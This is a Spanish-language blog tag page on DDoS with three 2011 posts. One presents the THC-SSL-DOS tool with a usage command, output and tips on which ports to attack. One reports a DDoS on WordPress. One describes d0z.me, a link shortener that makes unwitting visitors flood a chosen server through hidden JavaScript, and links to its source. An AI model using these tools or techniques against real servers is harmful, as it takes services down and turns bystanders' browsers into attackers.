Mostrando entradas con la etiqueta ddos. Mostrar todas las entradas
Mostrando entradas con la etiqueta ddos. Mostrar todas las entradas

miércoles, 2 de noviembre de 2011

[DoS/DDoS] THC SSL Tool

THC-SSL-DOS es una herramienta para comprobar el rendimiento de las conexiones SSL. Establecer una conexion segura requiere 15 veces mas procesamiento en el servidor que en el cliente. Esta herramienta usa esa propiedad para sobrecargar el servidor y provocar que se caiga. Este problema afecta a todas las implementaciones de SSL.






Ejemplo de uso:

./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err
- Los servidores normalmente suelen hacer 300 handshakes por segundo. Esto requeriria 10-25% del CPU de un portatil.
- El puerto HTTPS (443) no es siempre el mejor para realizar los ataques. Prueba tambien con otros puertos y servicios como POP3S, SMTPS, ...

Descarga:

Publicado por untrusted en 20:07:00 0 comentarios
Etiquetas: , , , , , , , ,

viernes, 4 de marzo de 2011

Ataque DDoS a WordPress


WordPress ha sufrido el mayor ataque DDoS de su historia en la madrugada de hoy.

Este problema ha generando una serie de problemas en millones de sitios que utilizan este servicio de blogs (como por ejemplo este portal).

El ataque comenzó de madrugada cuando sus servidores fueron víctimas de un ataque cuyo tamaño se calcula en múltiples gigabits por segundo y decenas de millones de paquetes por segundo.

El ataque fue de tal envergadura que terminó por afectar los tres centros de datos que la compañía posee (ubicados en Chicago, San Antonio y Dallas).

Según el fundador de WordPress, Matt Mullenweg, la masividad del ataque podría tener algún tipo de trasfondo político.

Desde WordPress aseguran que se están tomando todas las medidas que permitan mitigar el ataque (el que con el pasar de las horas se ha ido reduciendo), no descartan que vuelva a activarse en las próximas horas.

Si eres uno de los que se han visto afectados puedes chequear el estado actual de los servicios de WordPress desde este sitio.

Fuente: http://techcrunch.com/2011/03/03/wordpress-com-suffers-major-ddos-attack/
Publicado por untrusted en 22:07:00 0 comentarios
Etiquetas: , , ,

domingo, 30 de enero de 2011

[DoS] D0z.me - Url que genera ddos




D0z.me es un acortador de Url que tiene el siguiente funcionamiento:

Los atacantes van al sitio, ingresan un vínculo que quieran compartir y también introducen la dirección de un servidor que desean atacar también. Luego, comparten esta URL corta con tantas personas como sea posible y en tantos lugares como sea posible.

Cuando los usuarios hacen clic en el enlace corto, parecen ser redirigidos al contenido solicitado, pero en realidad están viendo la página en un iframe incrustado.

Mientras los usuarios están ocupados viendo la página, una denegación de servicio (a través de un Javascript malicioso). Si estos clientes siguen navegando por la página, se puede mantener la denegación de servicio en segundo plano todo el tiempo.

Codigo fuente : http://spareclockcycles.org/downloads/code/dosme.tar.gz

Sitio: http://d0z.me/
Publicado por untrusted en 13:57:00 0 comentarios
Etiquetas: , , ,
Suscribirse a: Comentarios (Atom)